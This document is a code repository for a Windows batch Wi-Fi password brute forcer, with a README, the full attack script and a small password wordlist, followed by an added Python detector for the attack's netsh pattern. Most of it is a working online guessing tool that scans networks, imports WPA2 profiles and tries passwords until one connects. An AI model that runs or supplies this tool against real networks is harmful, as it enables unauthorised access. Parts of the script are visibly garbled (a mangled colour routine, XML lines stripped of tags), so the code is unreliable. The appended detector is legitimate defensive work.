├── LICENSE
├── README.md
├── bruteforcer.cmd
└── wordlist.txt

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2023-2024 TechnicalUserX

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Batch Wi-Fi Brute Forcer
An active attack tool against Wi-Fi networks with internal CMD commands.

This program was created as a proof of concept that it is possible
to write a working Wi-Fi attack tool with batch files, since there
are countless examples on the internet that claim to be legit
hacking tools working on CMD. While this tool does not claim
a 100% success ratio, it still works if the target Wi-Fi has
a weak password. :)

## Usage

### Interface initialization
The program automatically detects your wireless interfaces when you execute the batch file.
If it finds only one, it will select it as default. If there are multiple interfaces,
the program will ask you to choose one. If none exist, it will stay "not_defined".

> You can later change the interface by typing `interface` on the main menu.
> This will bring the interface initialization screen back.

### Scan
When you type `scan` at the main menu, the program will enumerate all Wi-Fi networks
available from the selected wireless interface. You can choose one by typing the number
associated with an SSID.

> No Name could mean that the network is hidden. You cannot attack that network.

> Performing a scan disconnects the interface from the network it was previously connected to.

### Selecting a wordlist
A wordlist file is already provided in the repository. If you want to use a custom
wordlist, you have to specify the file you are going to use by typing `wordlist` on the
main menu and then typing the absolute or relative path of the wordlist file.

### Attacking
Simply type `attack` and the program will show you a warning screen saying that this process
will delete the profile associated with the SSID if you have connected to it before.
This means you will lose the password you entered when you previously connected to that SSID.
Save it before using the attack.

### Counter
When a connection to a network is attempted with `netsh`, it takes time to establish the connection. To check whether the connection is successful,
the program repeatedly queries the connection status of the selected interface. A counter value controls how many times this query will be done.
If not changed, the counter value is 10, and it counts down after each query for each password combination.

> If an authentication or association is detected, this value is increased by 5 to ensure a successful connection.

## Limitations
- This program has been tested unsuccessfully on Windows 7 and tested successfully on Windows 10 and 11. Since the output of some commands may differ between Windows versions, it is not expected to work on previous versions.

- ANSI escape sequences used in the terminal were added to the Windows Console in Windows 10 version 1511; previous versions are not expected to run this program.

- There is a strict dependency on the command line utility `netsh`, which cannot understand "Unicode" characters. Only ASCII characters are supported for network names.

- The command line utilities cannot be forced to output English-only text, so parsing depends on English-based output from command line utilities. Any other system language is not expected to be compatible with this program.

- The attack is significantly slow due to its nature.

- Cannot attack hidden networks.

## Result file
If an attack is successful, the result is automatically written to `result.txt`.


## Help screen
```txt
Commands

 - help             : Displays this page
 - wordlist         : Provide a wordlist file
 - scan             : Performs a WI-FI scan
 - interface        : Open Interface Management
 - attack           : Attacks selected WI-FI
 - counter          : Sets the attack counter
 - exit             : Close the program

 For more information, please refer to "README.md".

 More projects from TechnicalUserX:
 https://github.com/TechnicalUserX


Press any key to continue...
```

--------------------------------------------------------------------------------
/bruteforcer.cmd:
--------------------------------------------------------------------------------
@echo off
:: Batch Wi-Fi Brute Forcer - Developed By TechnicalUserX
:: Please refer to https://github.com/TechnicalUserX for more projects

:: This program was created as a proof of concept that it is possible
:: to write a working Wi-Fi attack tool with batch files, since there
:: are countless examples on the internet that claim to be legit
:: hacking tools working on CMD. While this tool does not claim
:: a 100% success ratio, it still works if the target Wi-Fi has
:: a weak password. :)

:: There is already a wordlist file in the repository but you are free
:: to use your own wordlists.

cls
setlocal enabledelayedexpansion
title Batch Wi-Fi Brute Forcer
color 0f

cd /D %~dp0

if exist "importwifi.xml" (
    del importwifi.xml
)

where wmic 1>nul 2>nul
if %errorlevel% equ 1 (
    call :exit_fatal "'wmic' command is not accessible from CMD. Please enable the Windows feature to access 'wmic'"
)

:: Interface Variables
set interface_number=0
set interface_mac=not_defined
set interface_id=not_defined
set interface_state=not_defined
set interface_description=not_defined
set wifi_target=not_defined

set attack_counter_option=0

if not exist "wordlist.txt" (
    set wordlist_file=not_defined
) else (
    set wordlist_file=wordlist.txt
)


:program_entry
call :interface_init
call :mainmenu
goto :eof

:interface_detection
cls
echo.
call :color_echo . yellow "Detecting interfaces..."
echo.
set interface_temp_index=0
set interface_number=0

set interface_parse_counter=0
set interface_parse_begin=false
set interface_parse_line=
set interface_parse_arg=

for /f "skip=2 tokens=* delims=" %%a in ('netsh wlan show interfaces ^| findstr /n "^"') do (
    set "interface_parse_line=%%a"
    set "interface_parse_line=!interface_parse_line:*:=!"

    if "!interface_parse_begin!" equ "true" if "!interface_parse_line!" neq "" (

        for /f "tokens=1,* delims=:" %%x in ('echo !interface_parse_line!') do set interface_parse_arg=%%y
        call :trim_spaces interface_parse_arg

        if "!interface_parse_counter!" equ "0" (
            set interface[!interface_temp_index!]_id=!interface_parse_arg!
        )

        if "!interface_parse_counter!" equ "1" (
            set interface[!interface_temp_index!]_description=!interface_parse_arg!
        )

        if "!interface_parse_counter!" equ "3" (
            set interface[!interface_temp_index!]_mac=!interface_parse_arg!
        )

        set /a interface_parse_counter=!interface_parse_counter!+1
    )

    if !interface_parse_counter! gtr 4 (
        set interface_parse_counter=0
        set /a interface_temp_index=!interface_temp_index!+1
        set interface_parse_begin=false
    )

    if "!interface_parse_line!" equ "" (
        set interface_parse_begin=true
    )

)

rem Last line must be redacted
set /a interface_temp_index=!interface_temp_index!-1

set /a interface_number=!interface_temp_index!+1
timeout /t 2 >nul
cls
goto :eof


:color_echo

:: Check if the first 2 arguments are empty, cause they are needed for background/foreground information
:: The 3rd argument is not that important because it can be an empty string
if "%~1" equ "" (
    goto :eof
)
if "%~2" equ "" (
    goto :eof
)

:: Background color; if invalid, no action
if "%~1" equ "black" (
    nul
)

if !interface_number! gtr 1 (

    call :color_echo . yellow " Multiple '!interface_number!' Interfaces Found!"
    echo.
    timeout /t 3 >nul
    call :interface_selection

)

if "!interface_number!"=="0" (

    call :color_echo . yellow "WARNING"
    echo.
    echo No interfaces found on this device^^!
    echo.
    set interface_id=not_defined
    set interface_description=not_defined
    set interface_mac=not_defined
    pause
    cls
)

goto :eof


:interface_selection
cls
echo.
call :color_echo . cyan "Interface Selection"
echo.
echo.
set wifi_target=not_defined
set /a interface_number_zero_indexed=!interface_number!-1
set /a cancel_index=!interface_number_zero_indexed!+1

for /l %%a in ( 0, 1, !interface_number_zero_indexed! ) do (
    call :color_echo . magenta "%%a) "
    call :color_echo . white " !interface[%%a]_description!("
    call :color_echo . blue "!interface[%%a]_mac!"
    call :color_echo . white ")"
    echo.
)
call :color_echo
call :color_echo . red "!cancel_index!) Cancel"
echo.
echo.

call :program_prompt

if "!program_prompt_input!" equ "" (
    call :program_prompt_invalid_input
    goto :interface_selection
)

if !program_prompt_input! leq !interface_number_zero_indexed! (
    if !program_prompt_input! geq 0 (
        echo.
        echo Making !interface[%program_prompt_input%]_description! the interface...
        set interface_id=!interface[%program_prompt_input%]_id!
        set interface_description=!interface[%program_prompt_input%]_description!
        set interface_mac=!interface[%program_prompt_input%]_mac!
        timeout /t 3 >nul
    ) else (
        if "!program_prompt_input!" equ "!cancel_index!" (
            set interface_id=not_defined
            set interface_description=not_defined
            set interface_mac=not_defined
            goto :eof
        ) else (
            call :program_prompt_invalid_input
            goto :interface_selection
        )
    )
) else (

    if "!program_prompt_input!" equ "!cancel_index!" (
        set interface_id=not_defined
        set interface_description=not_defined
        set interface_mac=not_defined
        goto :eof
    ) else (
        call :program_prompt_invalid_input
        goto :interface_selection
    )


)


goto :eof


:program_prompt
call :color_echo . green " bruteforcer"
call :color_echo . white "$ "
set /p program_prompt_input=
goto :eof


:program_prompt_invalid_input
call :color_echo . red "Invalid input"
timeout /t 3 >nul
goto :eof

:mainmenu
cls
echo.
echo.
echo. ______________
echo ___/ \_
echo \_ / _ __________\ _/
echo \ / \/ \ /
echo / \ \ \
echo \_ / \ \ \______ \ _/
echo \ \ \ \ \___// / /
echo \__/\__/ \___/ __/ /
echo \ / /
echo \_ \ / _/
echo \ \ / /
echo \________________/
echo.
echo.
call :color_echo . cyan "Batch Wi-Fi Brute Forcer - By TechnicalUserX"
echo.
echo.
call :color_echo . magenta "Interface : "
call :color_echo . white "!interface_description!("
call :color_echo . blue "!interface_mac!"
call :color_echo . white ") "
echo.
call :color_echo . magenta "ID : "
call :color_echo . white "!interface_id!"
echo.
call :color_echo . magenta "Target : "
call :color_echo . white "!wifi_target!"
echo.
call :color_echo . magenta "Wordlist : "
call :color_echo . white "!wordlist_file!"
echo.
echo.
echo Type 'help' for more info
echo.
call :program_prompt
echo.

if "%program_prompt_input%" equ "scan" (
    call :scan
    goto :mainmenu
)

if "%program_prompt_input%" equ "interface" (
    call :interface_init
    goto :mainmenu
)

if "%program_prompt_input%" equ "attack" (
    call :attack
    goto :mainmenu
)

if "%program_prompt_input%" equ "help" (
    call :help
    goto :mainmenu
)


if "%program_prompt_input%" equ "wordlist" (
    call :wordlist
    goto :mainmenu
)

if "%program_prompt_input%" equ "counter" (
    call :counter
    goto :mainmenu
)

if "%program_prompt_input%" equ "exit" (
    exit
)

call :program_prompt_invalid_input
goto :mainmenu


:scan
cls

if "%interface_id%" equ "not_defined" (
    call :color_echo . red "You have to select an interface to perform a scan"
    set wifi_target=not_defined
    echo.
    echo.
    pause
    goto :eof
)

netsh wlan disconnect interface="%interface_id%" > nul

:scan_wait_disconnected_loop
call :interface_find_state

if "%interface_state%" neq "disconnected" (
    goto :scan_wait_disconnected_loop
)


echo.
call :color_echo . cyan "Possible Wi-Fi Networks"
echo.
echo.
echo Scanning...
echo.
:: wifi[] is the array for possible wifis
set scan_wifi_index=0
set cancel_index=0

set scan_parse_counter=0
set scan_parse_begin=false
set scan_parse_line=
set scan_parse_arg=

for /f "skip=3 tokens=* delims=" %%a in ('netsh wlan show networks mode^=bssid interface^="%interface_id%" ^| findstr /n "^"') do (
    set "scan_parse_line=%%a"
    set "scan_parse_line=!scan_parse_line:*:=!"

    if "!scan_parse_begin!" equ "true" if "!scan_parse_line!" neq "" (
        for /f "tokens=1,* delims=:" %%x in ("!scan_parse_line!") do set scan_parse_arg=%%y

        call :trim_spaces scan_parse_arg

        if "!scan_parse_counter!" equ "0" (
            set wifi[!scan_wifi_index!]_ssid=!scan_parse_arg!
        )

        if "!scan_parse_counter!" equ "5" (
            set wifi[!scan_wifi_index!]_signal=!scan_parse_arg!
        )

        set /a scan_parse_counter=!scan_parse_counter!+1

    )

    if !scan_parse_counter! gtr 5 (
        set scan_parse_counter=0
        set /a scan_wifi_index=!scan_wifi_index!+1
        set scan_parse_begin=false
    )

    if "!scan_parse_line!" equ "" (
        set scan_parse_begin=true
    )

)
set /a scan_wifi_index=!scan_wifi_index!-1
set /a cancel_index=!scan_wifi_index!+1

for /l %%a in ( 0, 1, !scan_wifi_index! ) do (

    call :color_echo . magenta "%%a) "

    if "!wifi[%%a]_ssid!" equ "" (
        call :color_echo . red "No Name "
    ) else (
        call :color_echo . white "!wifi[%%a]_ssid! "
    )

    call :color_echo . blue "!wifi[%%a]_signal!"
    echo.
)


call :color_echo . red "!cancel_index!) Cancel"
echo.
echo.

call :program_prompt
echo.
if "!program_prompt_input!" equ "!cancel_index!" (
    goto :eof
)
if !program_prompt_input! leq !scan_wifi_index! if !program_prompt_input! geq 0 (
    set "wifi_target=!wifi[%program_prompt_input%]_ssid!"
    goto :eof
)
call :program_prompt_invalid_input

goto :eof


:attack

set attack_finalize=false

if "!wordlist_file!" equ "not_defined" (
    cls
    echo.
    call :color_echo . red "Please provide a wordlist..."
    echo.
    echo.
    pause
    goto :eof
)


if "!wifi_target!" equ "not_defined" (
    cls
    echo.
    call :color_echo . red "Please select a target after scanning..."
    echo.
    echo.
    pause
    goto :eof
)

if "!interface_id!" equ "not_defined" (
    cls
    echo.
    call :color_echo . red "Please select an interface..."
    echo.
    echo.
    pause
    goto :eof
)

cls
echo.
call :color_echo . yellow "WARNING"
echo.
echo.
echo If you connected to a network with the same name as this: "!wifi_target!",
echo its profile will be deleted.
echo.
echo This app might not find the correct password if the signal strength
echo is too low. Remember, this is an online attack. Expect slow attempts.
echo.
echo When an authentication is detected, attack counter is
echo automatically increased by 5 to ensure successful connection.
echo.
pause
netsh wlan delete profile name="!wifi_target!" interface="!interface_id!">nul
cls

set password_count=0

for /f "tokens=1" %%a in ( !wordlist_file! ) do (

    set /a password_count=!password_count!+1
    set password=%%a
    set temp_auth_num=0
    :: Prepare ssid import
    del /Q /F importwifi.xml 2>nul
    call :importwifi_write
    netsh wlan add profile filename="importwifi.xml" interface="!interface_id!" >nul
    cls
    echo.
    call :color_echo . cyan "Attacking"
    echo.
    echo.
    call :color_echo . magenta "Target Wi-Fi : "
    call :color_echo . white "!wifi_target!"
    echo.
    call :color_echo . magenta "Password Count : "
    call :color_echo . white "!password_count!"
    echo.
    echo.
    call :color_echo . blue "Trying password -> "
    call :color_echo . yellow "!password!"
    echo.
    echo.
    call :color_echo . cyan "Attempts: "
    echo.

    call :attack_attempt

    if "!attack_finalize!" equ "true" (
        set attack_finalize=false
        goto :eof
    )

)

call :attack_failure
goto :eof


:importwifi_write

set wifi_target_xml=!wifi_target!
set wifi_target_xml=!wifi_target_xml:^&=^&!
set wifi_target_xml=!wifi_target_xml:^<=^<!
set wifi_target_xml=!wifi_target_xml:^>=^>!
set wifi_target_xml=!wifi_target_xml:^"=^"!
set wifi_target_xml=!wifi_target_xml:^'=^'!

set password_xml=!password!
set password_xml=!password_xml:^&=^&!
set password_xml=!password_xml:^<=^<!
set password_xml=!password_xml:^>=^>!
set password_xml=!password_xml:^"=^"!
set password_xml=!password_xml:^'=^'!


echo ^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^!wifi_target_xml!^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^!wifi_target_xml!^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ESS^ >> importwifi.xml
echo ^manual^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^WPA2PSK^ >> importwifi.xml
echo ^AES^ >> importwifi.xml
echo ^false^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^passPhrase^ >> importwifi.xml
echo ^false^ >> importwifi.xml
echo ^!password_xml!^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^false^ >> importwifi.xml
echo ^ >> importwifi.xml
echo ^ >> importwifi.xml

goto :eof

:attack_failure
del /Q /F importwifi.xml 2>nul
cls
echo.
call :color_echo . red "Could not find the password"
echo.
echo.
netsh wlan delete profile "!wifi_target!" interface="!interface_id!">nul
pause
goto :eof

:attack_success
del /Q /F importwifi.xml 2>nul
cls
echo.
call :color_echo . green "Found the password"
echo.
echo.
echo.
call :color_echo . magenta "Target : "
call :color_echo . white "!wifi_target!"
echo.
call :color_echo . magenta "Password : "
call :color_echo . white "!password!"
echo.
call :color_echo . magenta "At attempt : "
call :color_echo . white "!password_count!"
echo.
echo.

echo Batch Wi-Fi Brute Forcer Result>>result.txt
echo Target : !wifi_target!>>result.txt
echo At attempt : !password_count!>>result.txt
echo Password : !password!>>result.txt
echo.>>result.txt
pause
goto :eof

:attack_attempt
netsh wlan connect name="%wifi_target%" interface="%interface_id%" >nul

if "%attack_counter_option%" equ "0" (
    set attack_counter=5
) else (
    set attack_counter=!attack_counter_option!
)

set attack_authenticating_detected=false

:attack_attempt_loop

if "!attack_counter!" equ "0" (
    del /Q /F importwifi.xml 2>nul
    goto :eof
)

call :color_echo . white "Attempts Left ("
call :color_echo . magenta "!attack_counter!"
call :color_echo . white ") "

timeout /t 1 /nobreak >nul
set interface_state=none
call :interface_find_state

if "%interface_state%"=="disconnecting" (
    call :color_echo . red "Timeout"
    echo.
)
if "%interface_state%"=="disconnected" (
    call :color_echo . red "Timeout"
    echo.
)
if "%interface_state%"=="authenticating" (
    call :color_echo . blue "Authenticating"
    echo.
)
if "%interface_state%"=="connecting" (
    call :color_echo . yellow "Connecting"
    echo.
)
if "%interface_state%"=="connected" (
    call :color_echo . green "Connected"
    echo.
    timeout /t 2 /nobreak>nul
)

if "%interface_state%" equ "authenticating" (
    if "!attack_authenticating_detected!" equ "false" (
        set /a attack_counter=!attack_counter!+5
        set attack_authenticating_detected=true
    )
)

if "!interface_state!" equ "connecting" (
    del /Q /F importwifi.xml 2>nul
    set attack_finalize=true
    call :attack_success
    goto :eof
)

if "!interface_state!" equ "connected" (
    del /Q /F importwifi.xml 2>nul
    set attack_finalize=true
    call :attack_success
    goto :eof
)


if "!interface_state!" equ "none" (
    call :exit_fatal "Cannot find interface state!"
)

set /a attack_counter=!attack_counter!-1

goto :attack_attempt_loop

goto :eof

:help
cls
echo.
call :color_echo . cyan "Commands"
echo.
echo.
echo - help : Displays this page
echo - wordlist : Provide a wordlist file
echo - scan : Performs a WI-FI scan
echo - interface : Open Interface Management
echo - attack : Attacks selected WI-FI
echo - counter : Sets the attack counter
echo - exit : Close the program
echo.
echo For more information, please refer to "README.md".
echo.
echo More projects from TechnicalUserX:
echo https://github.com/TechnicalUserX
echo.
echo.
echo Press any key to continue...
pause >nul

goto :eof


:wordlist
cls
echo.
call :color_echo . cyan "Wordlist"
echo.
echo.
echo Please provide a valid wordlist
echo.
call :program_prompt
echo.
if not exist "!program_prompt_input!" (
    call :color_echo . red "Provided path does not resolve to a file"
    timeout /t 2 >nul
) else (
    set wordlist_file=!program_prompt_input!
    goto :eof
)
goto :eof

:counter
cls
echo.
call :color_echo . cyan "Set Attempt Count"
echo.
echo.
echo Please provide number for per-password
echo counter while attacking a network.
echo.
echo This counter will be used to query network
echo connection whether it is successful.
echo.
call :program_prompt
echo.
echo %program_prompt_input%| findstr /r "^[0-9]*$" >nul

if "%errorlevel%" equ "0" (
    set attack_counter_option=!program_prompt_input!
) else (
    call :color_echo . red "Provided input is not a valid number"
    timeout /t 2 >nul
)
goto :eof

:interface_find_state

for /f "tokens=2 delims==" %%A in ('wmic path WIN32_NetworkAdapter where "NetConnectionID='!interface_id!'" get NetConnectionStatus /value') do (
    set interface_status_code=%%A
)

if "%interface_status_code%"=="1" (
    set interface_state=connecting
)

if "%interface_status_code%"=="2" (
    set interface_state=connected
)

if "%interface_status_code%"=="3" (
    set interface_state=disconnecting
)

if "%interface_status_code%"=="7" (
    set interface_state=disconnected
)

if "%interface_status_code%"=="8" (
    set interface_state=authenticating
)

goto :eof


:exit_fatal
call :color_echo . red "%~1"
timeout /t 3 >nul
exit
goto :eof


:trim_right
set "str=!%~1!"
:trim_right_loop
if "!str:~-1!"==" " (
    set "str=!str:~0,-1!"
    goto trim_right_loop
)
set %~1=!str!
goto :eof


:trim_left
set "str=!%~1!"
:trim_left_loop
if "!str:~0,1!"==" " (
    set "str=!str:~1!"
    goto trim_left_loop
)
set %~1=!str!
goto :eof


:trim_spaces
call :trim_left %1
call :trim_right %1
goto :eof

--------------------------------------------------------------------------------
/wordlist.txt:
--------------------------------------------------------------------------------
password
12341234
1a2b3c4d
12345678
123456789
1q2w3e4r
1234567890
1qaz2wsx
abcd1234
11111111
987654321
asdf1234
abcd6789
20202020
1234qwer
qwertyuiop
q1w2e3r4
88888888
qwerty123
passw0rd
asdfghjkl
asdfasdf
12345678910
Passw0rd
147852369
44444444
xxxxxxxx
a1234567
999999999
0987654321
77777777
789456123
0123456789
22222222
12121212
1234abcd
aaaaaaaa
11223344
a1b2c3d4
abcdefgh
1q2w3e4r5t
Password
asdfghjk
12qwaszx
12344321
qwerty12
87654321
123123123
hello123
00000000
--------------------------------------------------------------------------------
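
A defender-side view of the loop described in the README's Attacking and Counter sections (an added example, not part of the repository): every password attempt leaves a `netsh wlan add profile` immediately followed by a `netsh wlan connect` in process-creation telemetry, so a burst of such pairs for one SSID stands apart from a normal one-time join. The log layout, host names, SSIDs and thresholds below are assumptions constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# netsh invocations the script issues once per candidate password.
ADD_RE = re.compile(r'\bnetsh(?:\.exe)?\s+wlan\s+add\s+profile\b', re.I)
CONNECT_RE = re.compile(
    r'\bnetsh(?:\.exe)?\s+wlan\s+connect\b.*?\bname=(?:"([^"]*)"|(\S+))', re.I)


def parse(line):
    """Split '<ISO time> <host> <command line>' (layout assumed for this example)."""
    ts, host, cmd = line.split(" ", 2)
    return datetime.fromisoformat(ts), host, cmd


def detect_profile_churn(lines, threshold=5, window=timedelta(minutes=10),
                         pair_gap=timedelta(seconds=5)):
    """Alert on hosts with >= threshold add-profile/connect pairs for one SSID in window."""
    last_add = {}                   # host -> time of its latest 'add profile'
    attempts = defaultdict(deque)   # (host, ssid) -> times of add+connect pairs
    alerts = {}
    for line in lines:
        if not line.strip():
            continue
        ts, host, cmd = parse(line)
        if ADD_RE.search(cmd):
            last_add[host] = ts
            continue
        m = CONNECT_RE.search(cmd)
        if not m:
            continue
        added = last_add.pop(host, None)
        if added is None or ts - added > pair_gap:
            continue                # reconnect to an existing profile, not a fresh import
        ssid = m.group(1) if m.group(1) is not None else m.group(2)
        q = attempts[(host, ssid)]
        q.append(ts)
        while ts - q[0] > window:   # drop pairs that fell out of the sliding window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault((host, ssid), {"host": host, "ssid": ssid,
                                                 "first_seen": q[0], "pairs": 0})
            a["pairs"] = max(a["pairs"], len(q))
    return list(alerts.values())


def build_sample():
    """Constructed telemetry: WS-014 repeats the import/connect cycle, WS-020 joins once."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    rows = [(t0, "WS-014", 'netsh wlan delete profile name="CorpGuest" interface="Wi-Fi"')]
    for i in range(8):
        t = t0 + timedelta(seconds=2 + 12 * i)
        rows.append((t, "WS-014",
                     'netsh wlan add profile filename="importwifi.xml" interface="Wi-Fi"'))
        rows.append((t + timedelta(seconds=1), "WS-014",
                     'netsh wlan connect name="CorpGuest" interface="Wi-Fi"'))
    t1 = t0 + timedelta(minutes=3)
    rows.append((t1, "WS-020",
                 'netsh wlan add profile filename="office.xml" interface="Wi-Fi"'))
    rows.append((t1 + timedelta(seconds=1), "WS-020",
                 'netsh wlan connect name="Office" interface="Wi-Fi"'))
    rows.append((t1 + timedelta(hours=1), "WS-020",
                 'netsh wlan connect name="Office" interface="Wi-Fi"'))
    return [f"{ts.isoformat()} {host} {cmd}" for ts, host, cmd in rows]


if __name__ == "__main__":
    for alert in detect_profile_churn(build_sample()):
        print(alert)
```

Tune `threshold` and `window` to whatever legitimate onboarding tooling imports WLAN profiles in your environment. On the access-point side the same activity shows up as repeated failed WPA2 handshakes from a single client MAC.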